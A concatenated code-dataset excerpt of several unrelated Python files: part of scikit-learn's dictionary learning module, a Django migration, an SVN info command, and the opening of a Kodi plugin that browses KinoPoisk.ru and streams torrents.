fit_algorithm='lars', transform_algorithm='omp',
transform_n_nonzero_coefs=None, transform_alpha=None,
n_jobs=1, code_init=None, dict_init=None, verbose=False,
split_sign=False, random_state=None):
self._set_sparse_coding_params(n_components, transform_algorithm,
transform_n_nonzero_coefs,
transform_alpha, split_sign, n_jobs)
self.alpha = alpha
self.max_iter = max_iter
self.tol = tol
self.fit_algorithm = fit_algorithm
self.code_init = code_init
self.dict_init = dict_init
self.verbose = verbose
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self: object
Returns the object itself
"""
random_state = check_random_state(self.random_state)
X = array2d(X)
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
V, U, E = dict_learning(X, n_components, self.alpha,
tol=self.tol, max_iter=self.max_iter,
method=self.fit_algorithm,
n_jobs=self.n_jobs,
code_init=self.code_init,
dict_init=self.dict_init,
verbose=self.verbose,
random_state=random_state)
self.components_ = U
self.error_ = E
return self
class MiniBatchDictionaryLearning(BaseEstimator, SparseCodingMixin):
"""Mini-batch dictionary learning
Finds a dictionary (a set of atoms) that can best be used to represent data
using a sparse code.
Solves the optimization problem::
(U^*,V^*) = argmin 0.5 || Y - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
Parameters
----------
n_components : int,
number of dictionary elements to extract
alpha : int,
sparsity controlling parameter
n_iter : int,
total number of iterations to perform
fit_algorithm : {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
transform_algorithm : {'lasso_lars', 'lasso_cd', 'lars', 'omp', \
'threshold'}
Algorithm used to transform the data.
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection dictionary * X'
transform_n_nonzero_coefs : int, ``0.1 * n_features`` by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha : float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign : bool, False by default
Whether to split the sparse feature vector into the concatenation of
its negative part and its positive part. This can improve the
performance of downstream classifiers.
n_jobs : int,
number of parallel jobs to run
dict_init : array of shape (n_components, n_features),
initial value of the dictionary for warm restart scenarios
verbose :
degree of verbosity of the printed output
batch_size : int,
number of samples in each mini-batch
shuffle : bool,
whether to shuffle the samples before forming batches
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
`components_` : array, [n_components, n_features]
components extracted from the data
Notes
-----
**References:**
J. Mairal, F. Bach, J. Ponce, G. Sapiro, 2009: Online dictionary learning
for sparse coding (http://www.di.ens.fr/sierra/pdfs/icml09.pdf)
See also
--------
SparseCoder
DictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
def __init__(self, n_components=None, alpha=1, n_iter=1000,
fit_algorithm='lars', n_jobs=1, batch_size=3,
shuffle=True, dict_init=None, transform_algorithm='omp',
transform_n_nonzero_coefs=None, transform_alpha=None,
verbose=False, split_sign=False, random_state=None):
self._set_sparse_coding_params(n_components, transform_algorithm,
transform_n_nonzero_coefs,
transform_alpha, split_sign, n_jobs)
self.alpha = alpha
self.n_iter = n_iter
self.fit_algorithm = fit_algorithm
self.dict_init = dict_init
self.verbose = verbose
self.shuffle = shuffle
self.batch_size = batch_size
self.split_sign = split_sign
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
random_state = check_random_state(self.random_state)
X = array2d(X)
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U = dict_learning_online(X, n_components, self.alpha,
n_iter=self.n_iter, return_code=False,
method=self.fit_algorithm,
n_jobs=self.n_jobs,
dict_init=self.dict_init,
batch_size=self.batch_size,
shuffle=self.shuffle, verbose=self.verbose,
random_state=random_state)
self.components_ = U
return self
def partial_fit(self, X, y=None, iter_offset=0):
"""Updates the model using the data in X as a mini-batch.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
if not hasattr(self.random_state_):
self.random_state_ = check_random_state(self.random_state)
X = array2d(X)
if hasattr(self, 'components_'):
dict_init = self.components_
else:
dict_init = self.dict_init
U = dict_learning_online(X, self.n_components, self.alpha,
n_iter=self.n_iter,
method=self.fit_algorithm,
n_jobs=self.n_jobs, dict_init=dict_init,
batch_size=len(X), shuffle=False,
verbose=self.verbose, return_code=False,
iter_offset=iter_offset,
random_state=self.random_state_)
self.components_ = U
return self
| B3AU/waveTree | sklearn/decomposition/dict_learning.py | Python | bsd-3-clause | 40,489 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-17 02:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rvu', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='billingcode',
options={'ordering': ('ordering', 'code_name')},
),
migrations.AddField(
model_name='billingcode',
name='ordering',
field=models.IntegerField(blank=True, null=True),
),
]
| craighagan/rvumanager | rvusite/rvu/migrations/0002_auto_20160416_2224.py | Python | apache-2.0 | 593 |
import base
import datetime
class info(base.SVNBase):
def __init__(self, argv):
base.SVNBase.__init__(self)
self.path = '.'
self.recurse = False
if len(argv) > 0:
self.path = argv[-1]
def execute(self):
entries = self.client.info2(self.path, recurse=self.recurse)
for file, entry in entries:
self.display(file, entry)
def display(self, file, entry):
wc = entry.wc_info
print 'Path: ', self.path
self.display_field(entry, 'URL: ', 'URL')
self.display_field(entry, 'Repository Root: ', 'repos_root_URL')
if wc and wc.copyfrom_url:
self.display_field(wc, 'Branched from', 'copyfrom_url')
self.display_field(wc, 'Branched at', 'copyfrom_rev', self.format_revision)
self.display_field(entry, 'Repository UUID: ', 'repos_UUID')
self.display_field(entry, 'Revision: ', 'rev', self.format_rev)
self.display_field(entry, 'Node Kind: ', 'kind')
if wc:
self.display_field(wc, 'Schedule: ', 'schedule')
self.display_field(entry, 'Last commit author: ', 'last_changed_author')
self.display_field(entry, 'Last commit rev', 'last_changed_rev', self.format_rev)
self.display_field(entry, 'Last commit date', 'last_changed_date', self.format_datetime)
if wc:
self.display_field(wc, 'Text Last Updated: ', 'text_time', self.format_datetime)
self.display_field(wc, 'Checksum', 'checksum')
print
def display_field(self, container, info, field, format = None):
value = container.data[field]
if value:
if format:
print info + ': ', format(value)
else:
print info + ': ', value
def format_datetime(self, timestamp):
t = datetime.datetime.fromtimestamp(timestamp)
return t.strftime('%Y-%m-%d %H:%M:%S %z (%a, %d %b %Y)')
def format_rev(self, rev):
return rev.number
| ext/svnc | info.py | Python | gpl-3.0 | 2,022 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# * Copyright (C) 2011 TDW
import xbmc, xbmcgui, xbmcplugin, xbmcaddon, os, urllib, time, codecs, httplib
import SelectBox
from KPmenu import *
PLUGIN_NAME = 'KinoPoisk.ru'
siteUrl = 'www.KinoPoisk.ru'
httpSiteUrl = 'http://' + siteUrl
handle = int(sys.argv[1])
addon = xbmcaddon.Addon(id='plugin.video.KinoPoisk.ru')
__settings__ = xbmcaddon.Addon(id='plugin.video.KinoPoisk.ru')
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
icon = os.path.join( addon.getAddonInfo('path'), 'icon.png')
dbDir = os.path.join( addon.getAddonInfo('path'), "db" )
LstDir = addon.getAddonInfo('path')
headers = {
'User-Agent' : 'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.7.62 Version/11.00',
'Accept' :' text/html, application/xml, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*',
'Accept-Language':'ru-RU,ru;q=0.9,en;q=0.8',
'Accept-Charset' :'utf-8, utf-16, *;q=0.1',
'Accept-Encoding':'identity, *;q=0'
}
#---------asengine----by-nuismons-----
from ASCore import TSengine,_TSPlayer
def play_url(torr_link,img):
#print torr_link
TSplayer=TSengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
for k,v in TSplayer.files.iteritems():
li = xbmcgui.ListItem(urllib.unquote(k))
uri = construct_request({
't': torr_link,
'tt': k.encode('utf-8'),
'i':v,
'ii':urllib.quote(img),
'mode': 'addplist'
})
li.setProperty('IsPlayable', 'true')
li.addContextMenuItems([('Добавить в плейлист', 'XBMC.RunPlugin(%s)' % uri),])
uri = construct_request({
'torr_url': torr_link,
'title': k,
'ind':v,
'img':img,
'func': 'play_url2',
'mode': 'play_url2'
})
#li.addContextMenuItems([('Добавить в плейлист', 'XBMC.RunPlugin(%s?func=addplist&torr_url=%s&title=%s&ind=%s&img=%s&func=play_url2)' % (sys.argv[0],urllib.quote(torr_link),k,v,img )),])
xbmcplugin.addDirectoryItem(int(sys.argv[1]), uri, li)
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
TSplayer.end()
def addplist(params):
li = xbmcgui.ListItem(params['tt'])
uri = construct_request({
'torr_url': params['t'],
'title': params['tt'].decode('utf-8'),
'ind':urllib.unquote_plus(params['i']),
'img':urllib.unquote_plus(params['ii']),
'mode': 'play_url2'
})
xbmc.PlayList(xbmc.PLAYLIST_VIDEO).add(uri,li)
def play_url2(params):
#print 'play'
torr_link=urllib.unquote(params["torr_url"])
img=urllib.unquote_plus(params["img"])
title=urllib.unquote_plus(params["title"])
#showMessage('heading', torr_link, 10000)
TSplayer=TSengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
lnk=TSplayer.get_link(int(params['ind']),title, img, img)
if lnk:
item = xbmcgui.ListItem(path=lnk, thumbnailImage=img, iconImage=img)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
while not xbmc.Player().isPlaying:
xbmc.sleep(300)
while TSplayer.player.active and not TSplayer.local:
TSplayer.loop()
xbmc.sleep(300)
if xbmc.abortRequested:
TSplayer.log.out("XBMC is shutting down")
break
if TSplayer.local and xbmc.Player().isPlaying:
try: time1=TSplayer.player.getTime()
except: time1=0
i = xbmcgui.ListItem("***%s"%title)
i.setProperty('StartOffset', str(time1))
xbmc.Player().play(TSplayer.filename.decode('utf-8'),i)
else:
item = xbmcgui.ListItem(path='')
xbmcplugin.setResolvedUrl(int(sys.argv[1]), False, item)
TSplayer.end()
xbmc.Player().stop
#--------------tsengine----by-nuismons--------------
from TSCore import TSengine as tsengine
def construct_request(params):
return '%s?%s' % (sys.argv[0], urllib.urlencode(params))
def play_url_old(params):
torr_link=params['file']
img=urllib.unquote_plus(params["img"])
#showMessage('heading', torr_link, 10000)
TSplayer=tsengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
for k,v in TSplayer.files.iteritems():
li = xbmcgui.ListItem(urllib.unquote(k))
uri = construct_request({
'torr_url': torr_link,
'title': k,
'ind':v,
'img':img,
'mode': 'play_url2'
})
xbmcplugin.addDirectoryItem(handle, uri, li, False)
xbmcplugin.endOfDirectory(handle)
TSplayer.end()
def play_url2_old(params):
#torr_link=params['torr_url']
torr_link=urllib.unquote_plus(params["torr_url"])
img=urllib.unquote_plus(params["img"])
title=urllib.unquote_plus(params["title"])
#showMessage('heading', torr_link, 10000)
TSplayer=tsengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
TSplayer.play_url_ind(int(params['ind']),title, icon, img)
TSplayer.end()
#-----------------------libtorrents-torrenter-by-slng--------------------------------
import Downloader
try:import Downloader
except: pass
def playTorrent(url, StorageDirectory):
torrentUrl = url#__settings__.getSetting("lastTorrent")
if 0 != len(torrentUrl):
contentId = 0#int(urllib.unquote_plus(url))
torrent = Downloader.Torrent(torrentUrl, StorageDirectory)
torrent.startSession(contentId)
iterator = 0
progressBar = xbmcgui.DialogProgress()
progressBar.create('Подождите', 'Идёт поиск сидов.')
downloadedSize = 0
while downloadedSize < (44 * 1024 * 1024): #not torrent.canPlay:
time.sleep(0.1)
progressBar.update(iterator)
iterator += 1
if iterator == 100:
iterator = 0
downloadedSize = torrent.torrentHandle.file_progress()[contentId]
dialogText = 'Preloaded: ' + str(downloadedSize / 1024 / 1024) + ' MB / ' + str(torrent.getContentList()[contentId].size / 1024 / 1024) + ' MB'
peersText = ' [%s: %s; %s: %s]' % ('Seeds', str(torrent.torrentHandle.status().num_seeds), 'Peers', str(torrent.torrentHandle.status().num_peers))
speedsText = '%s: %s Mbit/s; %s: %s Mbit/s' % ('Downloading', str(torrent.torrentHandle.status().download_payload_rate * 8/ 1000000), 'Uploading', str(torrent.torrentHandle.status().upload_payload_rate * 8 / 1000000))
progressBar.update(iterator, 'Seeds searching.' + peersText, dialogText, speedsText)
if progressBar.iscanceled():
progressBar.update(0)
progressBar.close()
torrent.threadComplete = True
return
progressBar.update(0)
progressBar.close()
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
listitem = xbmcgui.ListItem(torrent.getContentList()[contentId].path)
playlist.add('file:///' + torrent.getFilePath(contentId), listitem)
progressBar.close()
xbmc.Player().play(playlist)
progressBar.close()
time.sleep(15)
while 1 == xbmc.Player().isPlayingVideo():
torrent.fetchParts()
torrent.checkThread()
time.sleep(1)
xbmc.executebuiltin("Notification(%s, %s)" % ('Информация', 'Загрузка торрента прекращена.'))
torrent.threadComplete = True
else:
print " Unexpected access to method playTorrent() without torrent content"
#===========================================================
def ru(x):return unicode(x,'utf8', 'ignore')
def xt(x):return xbmc.translatePath(x)
def mfindal(http, ss, es):
L=[]
while http.find(es)>0:
s=http.find(ss)
e=http.find(es)
i=http[s:e]
L.append(i)
http=http[e+2:]
return L
def debug(s):
fl = open(ru(os.path.join( addon.getAddonInfo('path'),"test.txt")), "w")
fl.write(s)
fl.close()
def inputbox():
skbd = xbmc.Keyboard()
skbd.setHeading('Поиск:')
skbd.doModal()
if skbd.isConfirmed():
SearchStr = skbd.getText()
return SearchStr
else:
return ""
def showMessage(heading, message, times = 3000):
xbmc.executebuiltin('XBMC.Notification("%s", "%s", %s, "%s")'%(heading, message, times, icon))
def GET(target, referer, post_params = None, accept_redirect = True, get_redirect_url = False, siteUrl='www.KinoPoisk.ru'):
try:
connection = httplib.HTTPConnection(siteUrl)
if post_params == None:
method = 'GET'
post = None
else:
method = 'POST'
post = urllib.urlencode(post_params)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
sid_file = os.path.join(xbmc.translatePath('special://temp/'), 'plugin.video.KinoPoisk.ru.cookies.sid')
if os.path.isfile(sid_file):
fh = open(sid_file, 'r')
csid = fh.read()
fh.close()
headers['Cookie'] = 'session=%s' % csid
headers['Referer'] = referer
connection.request(method, target, post, headers = headers)
response = connection.getresponse()
if response.status == 403:
raise Exception("Forbidden, check credentials")
if response.status == 404:
raise Exception("File not found")
if accept_redirect and response.status in (301, 302):
target = response.getheader('location', '')
if target.find("://") < 0:
target = httpSiteUrl + target
if get_redirect_url:
return target
else:
return GET(target, referer, post_params, False)
try:
sc = Cookie.SimpleCookie()
sc.load(response.msg.getheader('Set-Cookie'))
fh = open(sid_file, 'w')
fh.write(sc['session'].value)
fh.close()
except: pass
if get_redirect_url:
return False
else:
http = response.read()
return http
except Exception, e:
showMessage('Error', e, 5000)
return None
def fs(s):
s=str(repr(s))[1:-1]
s=s.replace('\\xb8','ё')
s=s.replace('\\xe0','a')
s=s.replace('\\xe1','б')
s=s.replace('\\xe2','в')
s=s.replace('\\xe3','г')
s=s.replace('\\xe4','д')
s=s.replace('\\xe5','е')
s=s.replace('\\xe6','ж')
s=s.replace('\\xe7','з')
s=s.replace('\\xe8','и')
s=s.replace('\\xe9','й')
s=s.replace('\\xea','к')
s=s.replace('\\xeb','л')
s=s.replace('\\xec','м')
s=s.replace('\\xed','н')
s=s.replace('\\xee','о')
s=s.replace('\\xef','п')
s=s.replace('\\xf0','р')
s=s.replace('\\xf1','с')
s=s.replace('\\xf2','т')
s=s.replace('\\xf3','у')
s=s.replace('\\xf4','ф')
s=s.replace('\\xf5','х')
s=s.replace('\\xf6','ц')
s=s.replace('\\xf7','ч')
s=s.replace('\\xf8','ш')
s=s.replace('\\xf9','щ')
s=s.replace('\\xfa','ъ')
s=s.replace('\\xfb','ы')
s=s.replace('\\xfc','ь')
s=s.replace('\\xfd','э')
s=s.replace('\\xfe','ю')
s=s.replace('\\xff','я')
s=s.replace('\\xa8','Ё')
s=s.replace('\\xc0','А')
s=s.replace('\\xc1','Б')
s=s.replace('\\xc2','В')
s=s.replace('\\xc3','Г')
s=s.replace('\\xc4','Д')
s=s.replace('\\xc5','Е')
s=s.replace('\\xc6','Ж')
s=s.replace('\\xc7','З')
s=s.replace('\\xc8','И')
s=s.replace('\\xc9','Й')
s=s.replace('\\xca','К')
s=s.replace('\\xcb','Л')
s=s.replace('\\xcc','М')
s=s.replace('\\xcd','Н')
s=s.replace('\\xce','О')
s=s.replace('\\xcf','П')
s=s.replace('\\xd0','Р')
s=s.replace('\\xd1','С')
s=s.replace('\\xd2','Т')
s=s.replace('\\xd3','У')
s=s.replace('\\xd4','Ф')
s=s.replace('\\xd5','Х')
s=s.replace('\\xd6','Ц')
s=s.replace('\\xd7','Ч')
s=s.replace('\\xd8','Ш')
s=s.replace('\\xd9','Щ')
s=s.replace('\\xda','Ъ')
s=s.replace('\\xdb','Ы')
s=s.replace('\\xdc','Ь')
s=s.replace('\\xdd','Э')
s=s.replace('\\xde','Ю')
s=s.replace('\\xdf','Я')
s=s.replace('\\xab','"')
s=s.replace('\\xbb','"')
s=s.replace('\\r','')
s=s.replace('\\n','\n')
s=s.replace('\\t','\t')
s=s.replace("\\x85",'...')
s=s.replace("\\x97",'-')
s=s.replace("\\xb7","·")
s=s.replace("\\x96",'-')
s=s.replace("\\x92",'')
s=s.replace("\\xb9",'№')
s=s.replace("\\xa0",' ')
s=s.replace('«','"')
s=s.replace('»','"')
s=s.replace('&','&')
s=s.replace('é','é')
s=s.replace('è','è')
s=s.replace('à','à')
s=s.replace('ô','ô')
s=s.replace('ö','ö')
return s
def formatKP(str):
str=str.strip()
str=str.replace('%','%25')
str=str.replace('&','%26')
str=str.replace('?','%3F')
str=str.replace('&','%26')
str=str.replace('!','%21')
str=str.replace(':','%3A')
str=str.replace('#','%23')
str=str.replace(',','%2C')
str=str.replace(';','%3B')
str=str.replace('@','%40')
str=str.replace('(','%28')
str=str.replace(')','%29')
str=str.replace('"','%22')
str=str.replace('а','%E0')
str=str.replace('б','%E1')
str=str.replace('в','%E2')
str=str.replace('г','%E3')
str=str.replace('д','%E4')
str=str.replace('е','%E5')
str=str.replace('ё','%b8')
str=str.replace('ж','%E6')
str=str.replace('з','%E7')
str=str.replace('и','%E8')
str=str.replace('й','%E9')
str=str.replace('к','%EA')
str=str.replace('л','%EB')
str=str.replace('м','%EC')
str=str.replace('н','%ED')
str=str.replace('о','%EE')
str=str.replace('п','%EF')
str=str.replace('р','%F0')
str=str.replace('с','%F1')
str=str.replace('т','%F2')
str=str.replace('у','%F3')
str=str.replace('ф','%F4')
str=str.replace('х','%F5')
str=str.replace('ц','%F6')
str=str.replace('ч','%F7')
str=str.replace('ш','%F8')
str=str.replace('щ','%F9')
str=str.replace('ь','%FA')
str=str.replace('ы','%FB')
str=str.replace('ъ','%FC')
str=str.replace('э','%FD')
str=str.replace('ю','%FE')
str=str.replace('я','%FF')
str=str.replace('А','%C0')
str=str.replace('Б','%C1')
str=str.replace('В','%C2')
str=str.replace('Г','%C3')
str=str.replace('Д','%C4')
str=str.replace('Е','%C5')
str=str.replace('Ё','%A8')
str=str.replace('Ж','%C6')
str=str.replace('З','%C7')
str=str.replace('И','%C8')
str=str.replace('Й','%C9')
str=str.replace('К','%CA')
str=str.replace('Л','%CB')
str=str.replace('М','%CC')
str=str.replace('Н','%CD')
str=str.replace('О','%CE')
str=str.replace('П','%CF')
str=str.replace('Р','%D0')
str=str.replace('С','%D1')
str=str.replace('Т','%D2')
str=str.replace('У','%D3')
str=str.replace('Ф','%D4')
str=str.replace('Х','%D5')
str=str.replace('Ц','%D6')
str=str.replace('Ч','%D7')
str=str.replace('Ш','%D8')
str=str.replace('Щ','%D9')
str=str.replace('Ь','%DA')
str=str.replace('Ы','%DB')
str=str.replace('Ъ','%DC')
str=str.replace('Э','%DD')
str=str.replace('Ю','%DE')
str=str.replace('Я','%DF')
str=str.replace(' ','+')
return str
def get_params():
param=[]
paramstring=sys.argv[2]
if len(paramstring)>=2:
params=sys.argv[2]
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-2]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
import sqlite3 as db
db_name = os.path.join( addon.getAddonInfo('path'), "move_info.db" )
c = db.connect(database=db_name)
cu = c.cursor()
def add_to_db(n, item):
item=item.replace("'","XXCC").replace('"',"XXDD")
err=0
tor_id="n"+n
litm=str(len(item))
try:
cu.execute("CREATE TABLE "+tor_id+" (db_item VARCHAR("+litm+"), i VARCHAR(1));")
c.commit()
except:
err=1
print "Ошибка БД"
if err==0:
cu.execute('INSERT INTO '+tor_id+' (db_item, i) VALUES ("'+item+'", "1");')
c.commit()
#c.close()
def get_inf_db(n):
tor_id="n"+n
cu.execute(str('SELECT db_item FROM '+tor_id+';'))
c.commit()
Linfo = cu.fetchall()
info=Linfo[0][0].replace("XXCC","'").replace("XXDD",'"')
return info
def s2kp(id, info):
#try:
import tokp
skp=tokp.Tracker()
RL,VL = skp.Search(id)
if len(RL)>0 or len(VL)>0:
Title = "[COLOR F050F050]"+"[-------------- «2kinopoisk.ru» --------------]"+"[/COLOR]"
row_url = Title
listitem = xbmcgui.ListItem(Title)
listitem.setInfo(type = "Video", infoLabels = {"Title": Title} )
purl = sys.argv[0] + '?mode=Search'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&text=' + urllib.quote_plus('0')
xbmcplugin.addDirectoryItem(handle, purl, listitem, True)
for itm in VL:
Title = "| 720p | VK.com | "+info["title"]+" [B][Смотреть онлайн][/B]"
row_url = itm
print itm
cover="http://vk.com/images/faviconnew.ico"
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, itm, listitem, False, len(RL))
for itm in RL:
Title = "|"+itm[0]+"|"+itm[1]+"| "+itm[2]
row_url = itm[3]
print row_url
cover=itm[4]
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, len(RL))
return len(RL)
#except:
#return 0
def rutor(text, info={}):
#try:
import rutors
rtr=rutors.Tracker()
#except: pass
RL=rtr.Search(text, "0")
if len(RL)>0:
Title = "[COLOR F050F050]"+"[------- «Rutor» "+text+" ---------]"+"[/COLOR]"
row_url = Title
listitem = xbmcgui.ListItem(Title)
listitem.setInfo(type = "Video", infoLabels = {"Title": Title} )
purl = sys.argv[0] + '?mode=Search'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&text=' + urllib.quote_plus('0')
xbmcplugin.addDirectoryItem(handle, purl, listitem, True)
for itm in RL:
Title = "|"+itm[0]+"|"+itm[1]+"| "+itm[2]
row_url = itm[3]
cover=""
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, len(RL))
return len(RL)
def stft(text, info={}):
try:
import krasfs
tft=krasfs.Tracker()
except: pass
RL=tft.Search(text, 4)
if len(RL)>0:
Title = "[COLOR F050F050]"+"[------- «KrasFS.ru» "+text+" ---------]"+"[/COLOR]"
row_url = Title
listitem = xbmcgui.ListItem(Title)
listitem.setInfo(type = "Video", infoLabels = {"Title": Title} )
purl = sys.argv[0] + '?mode=Search'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&text=' + urllib.quote_plus('0')
xbmcplugin.addDirectoryItem(handle, purl, listitem, True)
for itm in RL:
Title = "|"+itm[0]+"|"+itm[1]+"| "+itm[2]
row_url = itm[3]
cover=""
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, len(RL))
return len(RL)
def AddItem(Title = "", mode = "", info = {"cover":icon}, total=100):
params["mode"] = mode
params["info"] = info
cover = info["cover"]
try:fanart = info["fanart"]
except: fanart = ''
try:id = info["id"]
except: id = ''
listitem = xbmcgui.ListItem(Title, iconImage=cover)#, thumbnailImage=cover
listitem.setInfo(type = "Video", infoLabels = info )
listitem.setProperty('fanart_image', fanart)
purl = sys.argv[0] + '?mode='+mode+ '¶ms=' + urllib.quote_plus(repr(params))
if mode=="Torrents":
#listitem.addContextMenuItems([('Hайти похожие', 'SrcNavi("Navigator:'+id+'")')])
listitem.addContextMenuItems([('Hайти похожие', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=Recomend&id='+id+'")'), ('Персоны', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=Person&id='+id+'")')])
xbmcplugin.addDirectoryItem(handle, purl, listitem, False, total)
elif mode=="PersonFilm":
listitem.addContextMenuItems([('Добавить в Персоны', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=AddPerson&info='+urllib.quote_plus(repr(info))+'")'), ('Удалить из Персоны', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=RemovePerson&info='+urllib.quote_plus(repr(info))+'")')])
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, total)
else:xbmcplugin.addDirectoryItem(handle, purl, listitem, True, total)
def FC(s, color="FFFFFF00"):
s="[COLOR "+color+"]"+s+"[/COLOR]"
return s
def AddPerson(info):
try:PL=eval(__settings__.getSetting("PersonList"))
except: PL=[]
if info not in PL:
PL.append(info)
__settings__.setSetting(id="PersonList", value=repr(PL))
def RemovePerson(info):
try:PL=eval(__settings__.getSetting("PersonList"))
except: PL=[]
NL=[]
for i in PL:
if i!=info: NL.append(i)
__settings__.setSetting(id="PersonList", value=repr(NL))
def PersonList():
try:PL=eval(__settings__.getSetting("PersonList"))
except: PL=[]
for i in PL:
AddItem(fs(i["title"]), "PersonFilm", i, len(PL))
#__settings__.setSetting(id="PersonList", value=repr(PL))
def Person():
try:id = urllib.unquote_plus(get_params()["id"])
except: id = ''
link="http://m.kinopoisk.ru/cast/"+id+"/"
ss='<dt>'
se='</dd><dt>'
http = GET (link, httpSiteUrl)
L=mfindal(http, ss, se)
for i in L:
ss='<dt>'
se='</dt><dd>'
tb=mfindal(i, ss, se)[0][4:]
AddItem(FC(fs(tb)), "", {"cover":icon}, len(L))
ss='/person/'
se='</a>'
L2=mfindal(i, ss, se)
for j in L2:
n=j.find('/">')
nm=j[n+3:]
id=j[8:n]
cover="http://st.kp.yandex.net/images/sm_actor/"+id+".jpg"
cover="http://st.kp.yandex.net/images/actor_iphone/iphone360_"+id+".jpg"
#.replace('sm_film/','film_iphone/iphone360_')+'.jpg'
info={"cover":cover, "title":nm, "id":id}
AddItem(fs(nm), "PersonFilm", info, len(L))
def SrcNavi(md="Navigator"):
#ss="/level/1/film/"
ss='id="film_eye_'
#se='/">'
se='"></div>'
if md =="Navigator":
Cats=getList("CutList")
#Genres=getList("GenreList")
Cantrys=getList("CantryList")
Years=__settings__.getSetting("YearList")
Old=__settings__.getSetting("OldList")
Sort=__settings__.getSetting("SortList")
Rating=__settings__.getSetting("RatingList")
